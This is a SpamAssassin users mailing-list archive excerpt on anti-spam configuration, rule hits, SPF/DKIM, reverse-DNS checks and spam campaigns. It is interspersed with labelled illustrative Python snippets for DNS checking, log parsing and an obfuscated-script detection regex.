 Looking at the X-Spam-Report on various messages and I never see that
 its looked at.  I see that SPF is checked and scored.  Any idea why
 its not checking the DKIM signatures?

Check the file v312.pre and see if the loadplugin line for DKIM is commented 
out.  If it is, uncomment it.


whitelist ip in trusted network

2011-05-06 Thread Rajesh M
hi

i wish to whitelist a few client's server's static ip in the spamassasin
trusted network

i am entering a line like this in local.cf file.

trusted_networks xxx.yyy.zzz.ppp

if i do this then the email from this server ip should be given a negative
score but it does not seem to work

spamassassin does not work for any ip that i put here, even those ips of
my other servers are not trusted. It seems that spamassassin is simply not
even looking at the trusted network ips ie it is disabled due to some
reason

could you please help.

rajesh








Re: whitelist ip in trusted network

2011-05-06 Thread Rajesh M
 On 05/07, Rajesh M wrote:
 trusted_networks xxx.yyy.zzz.ppp

 if i do this then the email from this server ip should be given a
 negative
 score but it does not seem to work

 That's not what trusted_networks does.  It skips the Received header from
 those IPs for things like DNS blacklist lookups.

 --
 It's never too late to panic.
 http://www.ChaosReigns.com



hi

thanks for your quick reply.

could you please let me how i can whitelist specific servers belonging to
my clients from whom i have to receive email perfectly without ever being
treated as spam

rajesh






Re: new gappy domain campaign (w/sample)

2011-02-10 Thread Chip M.
mouss wrote:
with a stock config, and without Bayes, it now yields: 

Hmmm, interesting!

Yes, all the caught spam here were due to RBL hits.

Which begs the question, what SpamAssassin tests are hitting for 
the misses vs the kills?

Here's what hit (here), for the first 38 missed spams:
  Test                    Count
  FH_HELO_EQ_D_D_D_D          2
  FSL_HELO_DEVICE             1
  FSL_HELO_NON_FQDN_1         1
  HELO_DYNAMIC_HCC            2
  HELO_DYNAMIC_IPADDR2        1
  HELO_NO_DOMAIN              1
  RCVD_IN_BL_SPAMCOP_NET     13
  RCVD_IN_BRBL_LASTEXT        2
  RCVD_IN_PBL                 2 *
  RDNS_DYNAMIC                3
  RDNS_NONE                   1

Here's what hit for the first 26 caught spams:
  Test                    Count
  AXB_HELO_HOME_UN            1
  DATE_IN_FUTURE_Q_PLUS       1
  FH_HELO_EQ_D_D_D_D         12
  FSL_HELO_DEVICE             1
  FSL_HELO_NON_FQDN_1         8
  HELO_DYNAMIC_DHCP           3
  HELO_DYNAMIC_IPADDR         9
  HELO_DYNAMIC_IPADDR2        5
  HELO_DYNAMIC_SPLIT_IP       1
  HELO_LH_HOME                1
  HELO_NO_DOMAIN              8
  RCVD_IN_BRBL_LASTEXT       22
  RCVD_IN_PBL                25 *
  RCVD_IN_PSBL                1
  RCVD_IN_SORBS_DUL           3
  RCVD_IN_XBL                 1
  RDNS_DYNAMIC               16
  RDNS_NONE                  10

The contrast in PBL hits is interesting.
I wonder if RBLs list more aggressively if the IP is already on PBL?
Just a casual thought/question. :)


here, it gets BAYES_99 as well. 

Is that based on feeding any of these to your Bayes?

I just checked my latest samples, and they're still identical, 
body-wise, so feeding should be extremely effective.

I forgot to mention that these are hitting a few dictionary 
accounts which only receive spam from our old nemesis, the clever
wavy-images/RTF/ZIP/etc guy.  That's a major reason that I expect
these to morph, real soon. :\

In the past, that guy's campaigns have had a similarly low hit 
rate on PBL.  I've always wondered how he/they achieve that.
- Chip


Re: My attempt at re-calculating test scores

2010-12-24 Thread m
Hi,

Is this corpora available for public use (e.g using the corpora for their 
testings)? 

All I know is that SA has an old public corpora that dates back in 2005.

(Sending from BB)

---
Mahmoud Khonji

-Original Message-
From: Warren Togami Jr. wtog...@gmail.com
Date: Thu, 23 Dec 2010 12:45:14 
To: dar...@chaosreigns.com
Cc: users@spamassassin.apache.org
Subject: Re: My attempt at re-calculating test scores

BTW, if you have your own corpora, why not participate in the nightly
masscheck?  We are in serious need of additional participants in order to
enable promotion of new rules to the sa-update channel, and to make it
possible to release new versions of spamassassin.

Warren



RE: Fake MX

2010-12-13 Thread Rosenbaum, Larry M.
 From: Bob Proulx [mailto:b...@proulx.com]
 Subject: Re: Fake MX
 
   [...] but that is distinct from being a tarpit, which is what
   I'm trying to clarify.
 
  A discussion around the definition of tarpit, and why tarbaby might be a
  suboptimal, though catchy, name?
 
 For the record a tarbaby:
 
   http://en.wikipedia.org/wiki/Tar_baby
 
 is something different from a tarpit:
 
   http://en.wikipedia.org/wiki/Tarpit_%28networking%29
 
 Please, let's use the correct terminology.  They really are pretty far
 from being interchangeable.

I wonder if the OP was really referring to a honeypot?


RE: email address forgery

2010-11-12 Thread Rosenbaum, Larry M.
Are there domains that have actually defined SPF record type records?  I 
haven’t been able to find any, but it could be the fault of the tools I’m using.

L

From: Noel Butler [mailto:noel.but...@ausics.net]
Sent: Thursday, November 11, 2010 5:14 PM
To: users@spamassassin.apache.org
Subject: Re: email address forgery

On Thu, 2010-11-11 at 10:07 -0500, Rob McEwen wrote:

On 11/11/2010 9:11 AM, Jeremy Van Rooyen wrote:
 Can anybody explain to me how to do this and how would I be able to
 test it?

Jeremy,

I really like to use the following wizard to generate my SPF strings:

http://www.openspf.org/

Scroll down to the section that says Deploying SPF, enter the domain
name, and click GO. Then, on the next page, fine tune the answers to
the various questions before submitting the info to generate your SPF
string. Finally, go into your DNS server and, for that domain, add that
string as a TXT record.


*and* as an  SPF  record type, the TXT method is deprecated, but for time being 
it's good to use it since there are a lot, and I mean a  LOT of outdated DNS 
servers around that do not support it even today, yes, the fault of the DNS 
server admin for running antiquated rubbish, but, there's just no telling some 
people to get with the times.


Re: Full circle DNS test?

2010-10-29 Thread m
How do you expect this to handle cases when a single IP address (i.e. a single 
MTA) is responsible for sending emails for multiple domains? The domain name 
match won't happen for all.

That's why we have SPF, SenderID (MS didn't want to feel left out), and DKIM 
(RFC standard).

As far as reverse lookup goes, AOL requires MTAs to have a reverse PTR zone in 
the form of an FQDN, but doesn't mandate an exact match of the domain found in MAIL 
FROM in the SMTP header, which is less restrictive than your suggestion.

BTW, back in dark ages, there were discussions in RFC mailing lists of similar 
approaches like yours but got rejected. Paul Vixie had his own suggestions too.


--Original Message--
From: dar...@chaosreigns.com
To: users@spamassassin.apache.org
Subject: Full circle DNS test?
Sent: Oct 30, 2010 6:02 AM

I see there's a RDNS_NONE rule for when the sending IP address has no DNS
PTR (reverse DNS) record.  But no rule for when that PTR record doesn't
have a matching A (forward DNS) record that matches the sending IP?

For example, if you get an email from me, and look up the IP:

  64.71.152.40 - chaosreigns.com

Then you can look up that host name and get:

  chaosreigns.com - 64.71.152.40

And if that IP didn't match the sending IP, it would fail this test.

Is this something that would be accepted into spamassassin if I created a
module?  Or a feature that would be added if I didn't do it?

I block all email that doesn't pass this test at my MTA (postfix
reject_unknown_client_hostname), but I understand some people don't.

-- 
It's a dangerous business, Frodo, going out your front door. You step
into the Road, and if you don't keep your feet, there is no knowing
where you might be swept off to. - Bilbo Baggins
http://www.ChaosReigns.com



---
Mahmoud Khonji
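The full-circle check described in the quoted message (PTR for the connecting IP, each name resolved back to A records, pass only if the original IP is among them), as an added Python example; this is not SpamAssassin's rule set and not the poster's module. The resolver is a constructed in-memory table so the code runs offline; the 64.71.152.40 / chaosreigns.com pair is the one quoted above, the other entries are documentation-range samples.

```python
import ipaddress
from typing import Callable, Dict, List, Tuple

Resolver = Callable[[str, str], List[str]]

# Constructed zone data.  PTR records are keyed by the in-addr.arpa name a real
# resolver would query; forward records by hostname.
PTR_TABLE: Dict[str, List[str]] = {
    "40.152.71.64.in-addr.arpa": ["chaosreigns.com"],        # pair quoted in the post
    "10.2.0.192.in-addr.arpa": ["mail.example.net"],          # PTR whose A points elsewhere
    "20.2.0.192.in-addr.arpa": [],                            # no reverse record at all
    "30.2.0.192.in-addr.arpa": ["mx1.example.org", "mx2.example.org"],  # one of two confirms
}
A_TABLE: Dict[str, List[str]] = {
    "chaosreigns.com": ["64.71.152.40"],
    "mail.example.net": ["192.0.2.11"],
    "mx1.example.org": ["198.51.100.5"],
    "mx2.example.org": ["192.0.2.30", "198.51.100.6"],
}


def table_resolver(qname: str, rtype: str) -> List[str]:
    """Stand-in for DNS; swap in a real lookup (same signature) for production."""
    if rtype == "PTR":
        return PTR_TABLE.get(qname, [])
    if rtype in ("A", "AAAA"):
        return A_TABLE.get(qname, [])
    return []


def full_circle(ip_text: str, resolve: Resolver = table_resolver) -> Tuple[str, str]:
    """Return (verdict, confirming_name).

    'none'     - no PTR at all (what SpamAssassin's RDNS_NONE already covers)
    'mismatch' - PTR exists but no name resolves back to this IP
    'pass'     - at least one PTR name has a forward record equal to the IP
    """
    ip = ipaddress.ip_address(ip_text)
    names = resolve(ip.reverse_pointer, "PTR")
    if not names:
        return "none", ""
    forward_type = "A" if ip.version == 4 else "AAAA"
    for name in names:
        name = name.rstrip(".")
        forward = resolve(name, forward_type)
        if any(ipaddress.ip_address(addr) == ip for addr in forward):
            return "pass", name
    return "mismatch", ""


if __name__ == "__main__":
    for sample in ("64.71.152.40", "192.0.2.10", "192.0.2.20", "192.0.2.30"):
        print(sample, full_circle(sample))
```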

Re: Full circle DNS test?

2010-10-29 Thread m
I misread your email then, my bad.

As far as I understand it now, you are getting the hostname by a reverse 
DNS lookup against the connecting SMTP peer (that is sending a mail).

Then you use that FQDN for a DNS A RR query, and you expect this IP address 
to match against the SMTP peer's IP. This is even worse than my 
initial understanding.

Why would you want a DNS A RR to match an IP that is often found as an MX RR? Are 
you assuming A RR == MX RR? They won't match in many cases.

If you query for an MX DNS RR instead of A RR, it would be less stupid (but is 
still stupid). Paul Vixie's proposal was similar.

Final answer is your practical results. How many FP and TP are you getting? I 
would get crazy high FP in my case.


--Original Message--
From: dar...@chaosreigns.com
To: users@spamassassin.apache.org
Subject: Re: Full circle DNS test?
Sent: Oct 30, 2010 9:26 AM

I never said anything about the domain matching the MAIL FROM.  Or anything
else.  Just that the sending IP have a PTR record which matches an A record
which matches the sending IP.  Any domain.  And, of course, the test would
have false positives, as do most others.  

But as I said, I already block all email at my MTA that doesn't pass it.
Since January 2007, apparently.  So I think it's worth having a test for.

On 10/30, m...@khonji.org wrote:
 How do you expect this to handle cases when a single IP address (i.e. a single 
 MTA) is responsible for sending emails for multiple domains? The domain name 
 match won't happen for all.
 
 That's why we have SPF, SenderID (MS didn't want to feel left out), and DKIM 
 (RFC standard).
 
 As far as reverse lookup goes, AOL requires MTAs to have a reverse PTR zone 
 in the form of an FQDN, but doesn't mandate an exact match of the domain found in 
 MAIL FROM in the SMTP header, which is less restrictive than your suggestion.
 
 BTW, back in dark ages, there were discussions in RFC mailing lists of 
 similar approaches like yours but got rejected. Paul Vixie had his own 
 suggestions too.

-- 
There never has been an answer. There never will be an answer.
That's the answer. - Gertrude Stein
http://www.ChaosReigns.com



---
Mahmoud Khonji

Re: Collecting IP reputation data from many people

2010-10-21 Thread m
I was originally thinking it would be
most informative to provide the
number of spams and non-spams from
each IP over some time period.

Google has a presentation in CEAS (check ceas.cc website) that explained a very 
similar approach to fight SPAM by ranking mail senders. As the presentation 
claimed, google uses it with their email system and works well for them.



---
Mahmoud Khonji


Re: Collecting IP reputation data from many people

2010-10-21 Thread m

www.ceas.cc/2006/19.pdf


---
Mahmoud Khonji



Re: How do I get delisted from SORBS? [OT]

2010-10-08 Thread m
 It differs because I am saying they *should* remain listed forever.

False positives are far worse than false negatives for businesses. Some 
blacklists do not tolerate an FP rate of more than 1%.

Blacklists are behind the line as they don't fight zero-hour attacks, and the 
only reason why blacklists are appealing is really their low FP rate. This is 
why Google made a blacklist to fight phish and malware --- Google wanted an FP 
rate that is well below 1% (0.04% IIRC).

A blacklist with a high FP rate, such as SORBS, is of no use. We'd better use heuristics; 
at least we can fight zero-hour attacks with = FP rate.

My 0.02.


---
Mahmoud Khonji


Re: Need God/Christian rule sets

2010-10-03 Thread m
How do you propose to make such relations between the keywords, and how to 
mitigate false positives?

Naïve Bayes deals with words independently. If we want to link between words, I 
think we are into Natural Language Processing (NLP).

If you have any good thoughts please share.


---
Mahmoud Khonji

RE: DOS_OE_TO_MX

2010-09-29 Thread Rosenbaum, Larry M.


 -Original Message-
 From: njjrdell [mailto:nruggi...@dellmagazines.net]
 Sent: Wednesday, September 29, 2010 11:32 AM
 To: users@spamassassin.apache.org
 Subject: Re: DOS_OE_TO_MX
 
 
 I'm pretty sure she would not send a GTUBE. Here is another from her:
 
 Sep 28 08:35:26 nsmail spamd[207]: prefork: child states: II\n
 Sep 28 08:35:55 nsmail spamd[287]: spamd: connection from localhost
 [127.0.0.1] at port 50098\n
 Sep 28 08:35:55 nsmail spamd[287]: spamd: checking message
 000b01cb5f6e$b1bbfe80$6629a...@traci for (unknown):500\n
 Sep 28 08:35:55 nsmail spamd[287]: spamd: identified spam (4006.3/5.0) for
 (unknown):500 in 1.0 seconds, 142218 bytes.\n
 Sep 28 08:35:55 nsmail spamd[287]: spamd: result: Y 4006 -
 AWL,BAYES_50,DATE_IN_FUTURE_12_24,DOS_OE_TO_MX
 scantime=1.0,size=142218,user=(unknown),uid=500,required_score=5.0,rhost=l
 ocalhost,raddr=127.0.0.1,rport=50098,mid=000b01cb5f6e$b1bbfe80$6629a...@t
 raci,bayes=0.483846,autolearn=no\n
 
 
 I've never seen anything with a score as high as 4006. DOS_OE_TO_MX is the rule
 that is consistent, so I was hoping to find out where it is to make sure
 nothing is scored wrong.

score DOS_OE_TO_MX 2.602 3.086 2.265 2.523



RE: DOS_OE_TO_MX

2010-09-29 Thread Rosenbaum, Larry M.
 From: njjrdell [mailto:nruggi...@dellmagazines.net]
 Sent: Wednesday, September 29, 2010 12:05 PM
 To: users@spamassassin.apache.org
 Subject: RE: DOS_OE_TO_MX
 
 
 also, won't whitelisting her address open her up for spoofing?

AWL has nothing to do with whitelist_from and other similar options.  It's more 
of a score averager.
http://wiki.apache.org/spamassassin/AutoWhitelist

 thanks for the scores. Now would that just go into
 /usr/local/share/spamassassin/50_scores.cf?
 and why would that score be missing.

It's not missing.  It is in
/var/lib/spamassassin/3.003001/updates_spamassassin_org/50_scores.cf
or some similar directory. To find your config directory path, try this:

spamassassin -D config --lint


 
 Rosenbaum, Larry M. wrote:
 
 
 
  -Original Message-
  From: njjrdell [mailto:nruggi...@dellmagazines.net]
  Sent: Wednesday, September 29, 2010 11:32 AM
  To: users@spamassassin.apache.org
  Subject: Re: DOS_OE_TO_MX
 
 
  I'm pretty sure she would not send a GTUBE. Here is another from her
 
  Sep 28 08:35:26 nsmail spamd[207]: prefork: child states: II\n
  Sep 28 08:35:55 nsmail spamd[287]: spamd: connection from localhost
  [127.0.0.1] at port 50098\n
  Sep 28 08:35:55 nsmail spamd[287]: spamd: checking message
  000b01cb5f6e$b1bbfe80$6629a...@traci for (unknown):500\n
  Sep 28 08:35:55 nsmail spamd[287]: spamd: identified spam (4006.3/5.0)
  for
  (unknown):500 in 1.0 seconds, 142218 bytes.\n
  Sep 28 08:35:55 nsmail spamd[287]: spamd: result: Y 4006 -
  AWL,BAYES_50,DATE_IN_FUTURE_12_24,DOS_OE_TO_MX
 
 scantime=1.0,size=142218,user=(unknown),uid=500,required_score=5.0,rhost=l
 
 ocalhost,raddr=127.0.0.1,rport=50098,mid=000b01cb5f6e$b1bbfe80$6629a...@t
  raci,bayes=0.483846,autolearn=no\n
 
 
  I never seen anything with such a score of 4006. DOS_OE_TO_MX is the
 rule
  that is consistent, so I was hoping to find out where it is to make
 sure
  nothing is scored wrong
 
  score DOS_OE_TO_MX 2.602 3.086 2.265 2.523
 
 
 
 
 --
 View this message in context: http://old.nabble.com/DOS_OE_TO_MX-
 tp29839497p29840133.html
 Sent from the SpamAssassin - Users mailing list archive at Nabble.com.

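An added example (not code from the thread) that parses a spamd `result:` line of the shape quoted above and the `score` line Larry posted, then sums the static scores of the hit rules to show how much of the 4006 they cannot account for; AWL carries no fixed score in 50_scores.cf, so the remainder is the score averager at work. Only the DOS_OE_TO_MX scores come from the page; the BAYES_50 and DATE_IN_FUTURE_12_24 values are constructed placeholders, and the `mid=` field was left out of the sample line.

```python
import re

# Constructed sample in the shape of the spamd log line from the thread.
SAMPLE_LOG = ("Sep 28 08:35:55 nsmail spamd[287]: spamd: result: Y 4006 - "
              "AWL,BAYES_50,DATE_IN_FUTURE_12_24,DOS_OE_TO_MX "
              "scantime=1.0,size=142218,user=(unknown),uid=500,required_score=5.0,"
              "rhost=localhost,raddr=127.0.0.1,rport=50098,bayes=0.483846,autolearn=no")

# spamd: result: <Y|N|.> <int score> - <rule,rule,...> <key=value,...>
RESULT_RE = re.compile(r"spamd: result: (?P<flag>[YN.]) (?P<score>-?\d+) - "
                       r"(?P<rules>\S+) (?P<kv>\S+)")

def parse_score_line(line):
    """'score NAME s0 s1 s2 s3' -> (NAME, [s0, s1, s2, s3]).
    Scoresets: 0 = no net/no Bayes, 1 = net only, 2 = Bayes only, 3 = net + Bayes."""
    parts = line.split()
    return parts[1], [float(x) for x in parts[2:]]

SCORES = {
    "DOS_OE_TO_MX": parse_score_line("score DOS_OE_TO_MX 2.602 3.086 2.265 2.523")[1],
    # Constructed placeholder values, NOT the real 50_scores.cf entries:
    "BAYES_50": [0.0, 0.0, 0.8, 0.8],
    "DATE_IN_FUTURE_12_24": [3.0, 3.0, 3.0, 3.0],
}

def parse_result(line):
    """Pull verdict, rounded score, hit rules and the key=value tail out of one line."""
    m = RESULT_RE.search(line)
    if not m:
        return None
    kv = dict(item.split("=", 1) for item in m["kv"].split(",") if "=" in item)
    return {"spam": m["flag"] == "Y", "score": int(m["score"]),
            "rules": m["rules"].split(","),
            "required": float(kv["required_score"]), "fields": kv}

def explain(result, scores, scoreset=3):
    """Sum the static scores of the hit rules; what is left over must come from
    rules without a fixed score (AWL adjusts towards the sender's running average)."""
    static = sum(scores[r][scoreset] for r in result["rules"] if r in scores)
    return {"static": round(static, 3),
            "unexplained": round(result["score"] - static, 3),
            "dynamic_rules": [r for r in result["rules"] if r not in scores]}
```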


Re: New plugin: DecodeShortURLs

2010-09-20 Thread Chip M.
Steve Freegard wrote:
Hopefully it will be useful to others; you can grab it from:

Thanks Steve!

Suggestions (for future enhancements):

1. Consider splitting the list of shorteners between those that
are well established and KNOWN to be reasonably diligent, and
all others (e.g. the anti-pattern ably described last week in:
http://www.xkcd.com/792/ ).
Split them in such a way as to make it easy for users to test only
ONE set (probably the better known ones), and (perhaps) add an
option to score the rest without doing a DNS call.

2. Investigate BitLy's API.
I've been experimenting with it for a few months, and am very
pleased with the options and data it provides.  I still need to add
ham shortener links to my standard/automated testing (preliminary
results are excellent).
The only issue I had (at the very beginning) was signing up with
a mixed case API key, then lower casing it when I used it.  My BIM.

3. Please collect and share performance data.  Thanks in advance! :)


I still haven't deployed anything real-time (have had VERY limited
quality-dev-time this year - Grrr!Argh!).  Since these first became
a problem, I've been auto-quarantining (except for a very short list
of manually excluded newsletters and select validated Senders), then
we handle the DNS tests as part of our desktop-based FP pipeline.

The occurrence of shorteners in ham is low enough that that's been
acceptable to our userbase, largely because they run the actual
tests, so they have Complete Control.  It's been my experience that
not-stupid endusers who are given control are happy users.  They're
full participants in the process. :)
- Chip



Re: Yahoo HTML Base64 Attachments

2010-09-20 Thread Chip M.
On 19 Sep 2010, John Hardin wrote:
 Adding to my sandbox for masscheck: 
 
 rawbody HTML_OBFU_ESC /document\.write\(unescape\((?:%[0-9a-f]{2}){10}/i 

It performs pretty well. It should be in the next rules update, under a 
slightly different name (OBFU_JVSCR_ESC). 

Shiny!

How about combining/meta-ing that with a simple Base64 HTML rule?
I vaguely recall you may already have one (Base64 rule, not (yet) a
meta).

Based on my ham data, that pairing seems extraordinarily rare.

I just checked all 2010 data for my most diverse domain (three
generations of an extended family, with a superb mix of business
plus personal ham), and found only 58 (out of 66,795) hams with
Base64 HTML.
Of those, ZERO hit any of my anti-script tests, however 49 of them
did have an existing non-trivial pass rule that skips some of those
anti-script tests (in other words, those were already well known
(to us) for their poor mailing hygiene).

I just dumped the Content Type summary lines for all 58, and if
you're interested, John, I can email them as a zip.  Just eyeballing
them, there appears to be some interesting differences in the
filename distribution vs this spam campaign.

I checked a similar quantity of data for a pure business domain, and
found ZERO occurrences of Base64 HTML.

As is often the case, choosing tests and scores depends on one's ham
ecology.


Today: Talk Like a Pirate day

... and Today: Talk Like a Browncoat Day
i.e. the 8th anniversary of the TV broadcast debut of Firefly. :)

Keep flyin',
- Chip

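An added example, not part of the thread, that applies John's rawbody regex unchanged after decoding the transfer encoding (rawbody in SpamAssassin sees the decoded MIME text with HTML tags intact) and combines it with a simple Base64-HTML test as the meta Chip suggests. The MIME message and the escaped script fragment are constructed.

```python
import base64
import re
from email import message_from_string

# The rawbody regex from the thread, unchanged.
HTML_OBFU_ESC = re.compile(r"document\.write\(unescape\((?:%[0-9a-f]{2}){10}", re.I)

def build_sample(html, base64_html=True):
    """Constructed two-part message: plain text plus an HTML part, optionally base64."""
    if base64_html:
        body, cte = base64.b64encode(html.encode()).decode(), "base64"
    else:
        body, cte = html, "7bit"
    return ("From: sender@example.com\nTo: user@example.org\nSubject: test\n"
            "MIME-Version: 1.0\nContent-Type: multipart/alternative; boundary=\"b1\"\n\n"
            "--b1\nContent-Type: text/plain\n\nhello\n"
            f"--b1\nContent-Type: text/html\nContent-Transfer-Encoding: {cte}\n\n"
            f"{body}\n--b1--\n")

def check(raw):
    """Evaluate the two sub-tests and the meta over every text/html part."""
    msg = message_from_string(raw)
    obfu = b64html = False
    for part in msg.walk():
        if part.get_content_type() != "text/html":
            continue
        if part.get("Content-Transfer-Encoding", "").strip().lower() == "base64":
            b64html = True                     # the "simple Base64 HTML rule"
        decoded = part.get_payload(decode=True).decode("utf-8", "replace")
        if HTML_OBFU_ESC.search(decoded):      # what rawbody would match on
            obfu = True
    return {"HTML_OBFU_ESC": obfu, "BASE64_HTML": b64html, "META": obfu and b64html}

# Constructed body in the exact form the regex expects: 16 %XX escapes, no quote.
OBFU_HTML = ("<html><body><script>document.write(unescape(%3C%61%20%68%72%65%66"
             "%3D%22%68%74%74%70%3A%2F%2F))</script></body></html>")
```

Ham with Base64 HTML but no escaped script (the 58 of 66,795 cases Chip counted) trips only BASE64_HTML, so the meta alone carries the score.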


application/octet-stream obfuscated JPEGs

2010-09-20 Thread Chip M.
There's a new morph from our old nuisance, the inline PNG/RTF, and
all manner of wavy image insecure-boy-drugs spammer. :(

Here's a sample:
http://puffin.net/software/spam/samples/0009_jpg_oct.txt

It began (here) on Sep 10, and replaced his (relatively boring)
"Your wife photos attached" zipped JPEG.

This time, it has two parts.  The first is plain text, with his
often-seen-before anti-Bayes chunk of text from a copyright-expired
book.

The second part is a new-ish spin:
an image using application/octet-stream as the Content Type, but
otherwise sanely constructed (i.e. it has a full filename with
.jpg, which is the ACTUAL image encoding used, unlike some of his
previous morphs).

Sadly, I've seen this particular stupid-spammer-trick before...
in ham. :(  It's rare enough, and the senders broken enough, that
some may feel comfortable penalizing this pattern (maybe a simple
test of app/oct with an image file extension?).  On the other hand,
a significant percentage of the broken mailing lists that use this,
do tend to have high value with their recipients.  A cautious score
is advisable.

On a bright note, it does have the exact same JPEG header size that
I've previously reported (623 bytes).  It also continues this
spammer's use of random (ALWAYS wrong) Realnames in the To header.
Those two tests, plus nation of origin, are my main test hits.
So far, none have snuck thru my last layers of defense.
- Chip


